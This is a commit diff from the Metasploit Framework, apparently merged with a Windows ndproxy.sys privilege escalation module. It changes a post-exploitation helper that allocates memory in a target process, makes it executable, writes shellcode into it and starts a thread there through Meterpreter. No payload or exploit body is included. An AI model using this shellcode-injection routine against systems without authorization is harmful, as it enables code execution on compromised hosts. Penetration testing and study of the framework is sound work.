Land rapid7#2755 - Microsoft Windows ndproxy.sys Local Privilege Escalation

Author: wchen-r7

lib/msf/core/post/windows/process.rb

@@ -23,15 +23,18 @@ def execute_shellcode(shellcode, base_addr=nil, pid=nil)
     else
       shell_addr = host.memory.allocate(shellcode.length, nil, base_addr)
     end
+
+    host.memory.protect(shell_addr)
+
     if host.memory.write(shell_addr, shellcode) < shellcode.length
       vprint_error("Failed to write shellcode")
       return false
     end
 
     vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
-    ret = session.railgun.kernel32.CreateThread(nil, 0, shell_addr, nil, 0, nil)
-    if ret['return'] < 1
-      vprint_error("Unable to CreateThread")
+    thread = host.thread.create(shell_addr,0)
+    unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)
+      vprint_error("Unable to create thread")
       return false
     end